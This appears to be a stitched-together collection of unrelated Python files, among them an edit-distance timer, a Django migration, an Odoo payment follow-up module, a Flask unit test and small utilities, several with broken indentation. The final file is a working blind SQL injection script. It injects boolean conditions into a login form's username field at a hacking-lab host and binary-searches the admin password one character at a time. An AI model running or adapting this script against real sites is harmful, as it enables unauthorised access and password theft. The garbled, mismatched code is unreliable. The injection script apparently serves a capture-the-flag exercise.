    def timed(fn, left, right):
        # Run fn once and return (result, elapsed seconds).
        begin = time.time()
        value = fn(left, right)
        return value, time.time() - begin

    total_base, total_mod, total_rec = 0, 0, 0
    fixed = "aaaaaa"
    for step in range(10):
        varying = "a" * (7 - step) + "b" * step
        for _ in range(100):
            a, spent = timed(bs.distance, fixed, varying)
            total_base += spent
            b, spent = timed(md.distance, fixed, varying)
            total_mod += spent
            c, spent = timed(rec.distance, fixed, varying)
            total_rec += spent
        print("{0:f} {1:f} {2:f} {3}{4}{5}".format(
            total_base / 100 * 1000, total_mod / 100 * 1000,
            total_rec / 100 * 1000, a, b, c))
if __name__ == "__main__":
# result_test()
time_test() |
test = 'test str'
print(test.encode('utf_8'))  # encode str -> bytes
test = bytes('test', encoding='utf_8')
print(test[:2])
# memoryview exposes slices of other binary sequences, packed arrays and
# buffers by sharing memory rather than copying the byte sequence.
# The chardet library can be used to detect the encoding of a byte sequence.
# Never rely on the default encoding.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-26 15:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Sets Spanish verbose names on ItemSolucion and adds an optional
    slug field to Solucion."""

    dependencies = [
        ('web_soluciones', '0003_itemsolucion'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='itemsolucion',
            options={'verbose_name': 'Item Solución', 'verbose_name_plural': 'Items Soluciones'},
        ),
        migrations.AddField(
            model_name='solucion',
            name='slug',
            # blank/null so existing rows need no value at migration time.
            field=models.SlugField(blank=True, null=True),
        ),
    ]
|
import os
replayList = os.listdir('replays')
#replayList = os.listdir('.')
#replayList.remove('map_counter.py')
for i in range(len(replayList)):
splittedReplayName = replayList[i].split('_')
for l in range(1, len(splittedReplayName)):
if splittedReplayName[-l].isdigit() == True:
temp = "_".join(splittedReplayName[-l:]).replace('.wotreplay', '')
break
replayList[i] = temp
mapCount = dict()
for map in replayList:
mapCount[map] = mapCount.get(map, 0) + 1
#print mapCount
resultList = list()
for m in mapCount:
resultList.append( (mapCount[m], m) )
resultList.sort()
print "Total number of battles is " + str(len(replayList)) + ":"
for i in resultList[::-1]:
print str(i[0]) + ' is count of "' + i[1] + '"'
raw_input("Press Enter.")
|
# -*- coding: utf-8 -*-
# © 2018 Cousinet Eloi (Open Net Sarl)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, fields, models, _
from datetime import datetime
from datetime import timedelta
import logging
# Module-level logger named after this module (standard Odoo practice).
_logger = logging.getLogger(__name__)
class Followup(models.Model):
    """Follow-up policy, one record per company, made of ordered lines."""
    _name = "followup.followup"
    _description = "Account Follow-up"

    ##########
    # Fields #
    ##########
    # Display name mirrors the company name.
    name = fields.Char(
        string='Name',
        related='company_id.name',
        readonly=True  # fixed: was the string 'True' (truthy, but wrong type)
    )
    company_id = fields.Many2one(
        'res.company',
        'Company',
        required=True,  # fixed: was the string 'True'
        default=lambda self: self.env['res.company']._company_default_get('followup.followup')
    )
    # Ordered escalation steps of this policy.
    followup_line = fields.One2many(
        'followup.followup_line',
        'followup_id',
        string='Follow-up'
    )
class FollowupLine(models.Model):
    """One escalation step of a follow-up policy: how many days after the
    due date to wait, and which reminder action to take."""
    _name = "followup.followup_line"
    _description = "Follow-up criteria"
    _order = 'delay'

    ##########
    # Fields #
    ##########
    name = fields.Char(
        string='Follow-up Action',
        required=True  # fixed: was the string 'True'
    )
    sequence = fields.Integer(
        string='Sequence',
        help="Gives the sequence order when displaying a list of follow-ups lines."
    )
    delay = fields.Integer(
        string='Due days',
        help="The number of days after the due date of the invoice to wait before sending the reminder. Could be negative if you want to send a polite alert beforehand.",
        required=True
    )
    followup_id = fields.Many2one(
        'followup.followup',
        string='Follow-up',
        required=True,
        ondelete='cascade'
    )
    description = fields.Text(
        string='Printed Message',
        translate=True,
        default="""
Exception made if there was a mistake of ours, it seems that the following amount stays unpaid. Please, take appropriate measures in order to carry out this payment in the next 8 days.
Would your payment have been carried out after this mail was sent, please ignore this message. Do not hesitate to contact our accounting department.
Best Regards,
"""
    )
    action = fields.Selection([
        ('email', 'Send an email'),
        ('letter', 'Send a letter'),
        ('manual', 'Manual action')
    ])
    manual_action_note = fields.Text(
        string='Action To Do',
        placeholder="e.g. Give a phone call, check with others, ..."
    )
    manual_action_responsible_id = fields.Many2one(
        'res.users',
        string="Assign a responsible",
        ondelete='set null'
    )
    email_template_id = fields.Many2one(
        'mail.template',
        string='Email Template',
        ondelete='set null',
    )

    def _recompute_open_receivables(self):
        # Refresh next_follow_line_id on every open receivable move line
        # (unreconciled, active receivable account, positive residual);
        # shared by create() and write() below.
        for record in self.env['account.move.line'].search([
            ('full_reconcile_id', '=', False), ('account_id.deprecated', '=', False), ('account_id.internal_type', '=', 'receivable'), ('amount_residual', '>', 0)
        ]):
            record._compute_next_follow_line_id()

    @api.model
    def create(self, values):
        """Create the line, then refresh follow-up levels on open items."""
        rec = super(FollowupLine, self).create(values)
        self._recompute_open_receivables()
        return rec

    @api.multi
    def write(self, values):
        """Update the line, then refresh follow-up levels on open items."""
        rec = super(FollowupLine, self).write(values)
        self._recompute_open_receivables()
        return rec
class AccountMoveLine(models.Model):
    """Adds follow-up tracking fields to journal items."""
    _inherit = 'account.move.line'

    ##########
    # Fields #
    ##########
    # The follow-up level already applied to this receivable line.
    follow_line_id = fields.Many2one(
        'followup.followup_line',
        string='Follow-up Level',
        ondelete='restrict'
    )
    # When the latest reminder was sent.
    follow_date = fields.Datetime(
        string='Latest Follow-up'
    )
    # Read-only mirrors of the related invoice amounts.
    amount_total = fields.Monetary(
        related="invoice_id.amount_total",
        readonly=True
    )
    residual = fields.Monetary(
        related="invoice_id.residual",
        readonly=True
    )
    ####################
    # Computed methods #
    ####################
    @api.model
    def _default_next_follow_line_id(self):
        # First follow-up level (smallest delay).  Kept as a default helper,
        # though the field below currently uses the compute method instead.
        return self.env['followup.followup_line'].search([], limit=1, order='delay asc')
@api.depends('follow_line_id', 'date_maturity')
def _compute_next_follow_line_id(self):
for account_move_line in self.env['account.move.line'].search([
('id', 'in', list(map(lambda x: x.id, self))),
('full_reconcile_id', '=', False), ('account_id.deprecated', '=', False), ('account_id.internal_type', '=', 'receivable'), ('amount_residual', '>', 0)
]):
if account_move_line.follow_line_id:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([
('delay', '>', account_move_line.follow_line_id.delay)],
limit=1,
order='delay asc'
)
if not account_move_line.next_follow_line_id:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([], limit=1, order='delay desc')
else:
account_move_line.next_follow_line_id = self.env['followup.followup_line'].search([], limit=1, order='delay asc')
@api.depends('next_follow_line_id')
def _compute_next_followup_date(self):
for account_move_line in self:
date = datetime.strptime(account_move_line.date_maturity, '%Y-%m-%d')
date = date + timedelta(days=account_move_line.next_follow_line_id.delay)
account_move_line.next_followup_date = date
@api.multi
def _compute_day_late(self):
for account_move_line in self:
delta = datetime.today() - datetime.strptime(account_move_line.date_maturity, '%Y-%m-%d')
account_move_line.day_late = delta.days
############
# Computed #
############
next_followup_date = fields.Datetime(
compute=_compute_next_followup_date,
default=False,
store=True
)
next_follow_line_id = fields.Many2one(
'followup.followup_line',
# default=_default_next_follow_line_id,
compute=_compute_next_follow_line_id,
store=True
)
day_late = fields.Integer(
compute=_compute_day_late,
store=False
)
@api.multi
def write(self, values):
for key in values.keys():
if key not in ['follow_line_id', 'next_follow_line_id', 'follow_date', 'install_mode_data']:
return super(AccountMoveLine, self).write(values)
return super(AccountMoveLine, self.with_context(bypass_date_verif=True)).write(values)
class AccountMove(models.Model):
    """Move extension allowing follow-up writes to skip the lock-date check."""
    _inherit = "account.move"

    @api.multi
    def _check_lock_date(self):
        """Skip the lock-date verification when the caller set the
        ``bypass_date_verif`` context key; otherwise defer to the standard check."""
        bypass = self._context.get('bypass_date_verif')
        if not bypass:
            return super(AccountMove, self)._check_lock_date()
        return True
class ResPartner(models.Model):
    """Partner extension exposing the move lines needing a letter/manual follow-up."""
    _inherit = 'res.partner'

    @api.one
    def _get_account_move_line_letter(self):
        """Collect this partner's move lines whose next follow-up action is a
        letter or a manual action, restricted to the caller's selection
        (``active_ids`` in context) and to non-blocked lines, ordered by next
        follow-up date. Fills account_move_line_letter_id and returns the set.
        """
        lines = self.env['account.move.line'].search(
            [('partner_id', '=', self.id),
            ('next_follow_line_id.action', 'in', ['letter', 'manual']),
            ('id', 'in', self._context.get('active_ids', [])),
            ('blocked', '=', False)],
            order="next_followup_date asc"
        )
        self.account_move_line_letter_id = lines
        return lines

    ###################
    # Computed fields #
    ###################
    # Non-stored one2many filled on the fly by the compute above.
    account_move_line_letter_id = fields.One2many(
        'account.move.line',
        compute=_get_account_move_line_letter,
        store=False
    )
|
'''Test module for pushing a product
and calculating the streaming mean of product scores.'''
import os
import tempfile
import unittest
import db
import route
class ProductTestCase(unittest.TestCase):
    '''
    The class contains all tests:
    - Test input
        not valid
        out of range
    - Test accuracy of result
    Attributes:
        app: Flask test client used to exercise the API
        db_temp (int): file descriptor of the temporary database file
    '''

    def setUp(self):
        """Point the app at a fresh temporary database and initialise it."""
        # mkstemp() returns (fd, path); patching db.DATABASE redirects the
        # application under test to the throwaway file.
        self.db_temp, db.DATABASE = tempfile.mkstemp()
        self.app = route.APP.test_client()
        self.app.get('/api/init_db')

    def tearDown(self):
        """Close and remove the temporary database file."""
        os.close(self.db_temp)
        # Fix: mkstemp() files are NOT deleted automatically; without this
        # unlink every test run leaked one file in the temp directory.
        os.unlink(db.DATABASE)

    def test_product_not_int(self):
        '''test pushing a product with score is a float (not integer) (score = 2.3)'''
        json_response = self.app.post('/api/push', json={
            'UUID': 'a1-b1', 'score': 2.3
        }).get_json()
        self.assertEqual(json_response, route.ERROR_VALIDATE)

    def test_product_score_out_of_range(self):
        '''test pushing a product with out of range score <0 or >5 (score =6)'''
        json_response = self.app.post('/api/push', json={
            'UUID': 'a1-b1', 'score': 6
        }).get_json()
        self.assertEqual(json_response, route.ERROR_VALIDATE)

    def test_push_product_three_times(self):
        '''test pushing a product with 3 different scores, checking the running mean'''
        json_response = self.app.post('/api/push', json={
            'UUID': 'a1-b1', 'score': 5
        }).get_json()
        self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 5})
        json_response = self.app.post('/api/push', json={
            'UUID': 'a1-b1', 'score': 3
        }).get_json()
        self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 4})
        json_response = self.app.post('/api/push', json={
            'UUID': 'a1-b1', 'score': 4
        }).get_json()
        self.assertEqual(json_response, {'UUID': 'a1-b1', 'mean': 4})
# Allow running the test module directly (in addition to a test runner).
if __name__ == '__main__':
    unittest.main()
|
#google
from googlesearch import search
import webbrowser as wb
import text_speech
def play():
    """Prompt the user for a song (voice prompt + keyboard input), search the
    web for its SoundCloud page, and open the top result in a new browser tab."""
    text_speech.say("What do you want to listen:")
    track = raw_input()
    search_query = "play " + track + " sound cloud"
    # num=1/stop=1 yields a single result; pause throttles requests to Google.
    results = search(search_query, tld="com", num=1, stop=1, pause=2)
    for hit in results:
        wb.open_new_tab(hit)
|
## Read two integers "n mod" from one stdin line and print n! modulo mod.
# Fixes: no longer shadows the builtin `str`, no longer reuses `n` as the
# comprehension variable, and uses the parenthesized print form that works
# under both Python 2 and Python 3.
line = raw_input()
n, mod = [int(tok) for tok in line.split()]
ans = 1
for i in range(1, n + 1):
    ans *= i
    # Reduce after every multiply so the running product stays below mod.
    ans %= mod
print(ans)
|
#!/usr/bin/python3
import requests
import string
# Candidate character space (digits + letters + punctuation).
# NOTE(review): currently unused — check_char() binary-searches raw ASCII codes instead.
s_space = string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation
# Assumes an account with credentials t:t exists on the target.
def check_inj(st):
    """Send one blind SQL-injection probe: log in as user ``t`` with the
    boolean condition ``st`` spliced into the username, and return True when
    the login succeeds (i.e. the condition held server-side)."""
    print(st)
    payload = {'username': "t' AND " + st + " --", 'password': 't'}
    response = requests.post("https://blind.idocker.hacking-lab.com/index.php", data=payload)
    # A successful login page contains the marker text "as t".
    return "as t" in response.text
def get_len():
    """Binary-search the length of the 'admin' password (assumed 0..50),
    one blind-SQLi comparison per step via check_inj().

    Terminates when the midpoint repeats: the surviving bound is returned.
    """
    lmiddle = -1
    # NOTE(review): `found` is never set to True — the loop exits only via return.
    found = False
    mi = 0
    middle = 25
    ma = 50
    while(not found):
        # True -> `middle` is strictly greater than the password length.
        if(check_inj(str(middle) + "> (SELECT length(password) FROM users WHERE name = 'admin')")):
            ma = middle
            if(middle == lmiddle):
                return mi
        else:
            mi = middle
            if(middle == lmiddle):
                return middle
        lmiddle = middle
        middle = (mi + ma) // 2
def check_char(index):
    """Binary-search the ASCII code (33..126) of the admin password character
    at 1-based position ``index``, one blind-SQLi comparison per step via
    check_inj(). Terminates when the midpoint repeats (bounds converged).

    Fix: removed leftover debug prints ("STATS" and the bound dump) that were
    unreachable after the return-only ``while True`` loop.
    """
    lmiddle = -1        # midpoint of the previous iteration
    mi = 33             # lowest printable ASCII candidate
    ma = 126            # highest printable ASCII candidate
    middle = ma // 2
    while True:
        # True  -> the candidate char compares greater than the real one: lower the upper bound.
        # False -> the candidate is <= the real one: raise the lower bound.
        if check_inj("'" + chr(middle) + "' " + "> (SELECT substr(password, " + str(index) + ", 1) FROM users WHERE name='admin')"):
            ma = middle
            if middle == lmiddle:
                return ma
        else:
            mi = middle
            if middle == lmiddle:
                return mi
        lmiddle = middle
        middle = (mi + ma) // 2
# Driver: recover the admin password length, then extract it one character
# at a time, echoing each prefix as it grows.
str_len = get_len()
print("FLAG LEN: " + str(str_len))
flag = ""
for position in range(1, str_len + 1):
    flag += chr(check_char(position))
    print(flag)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.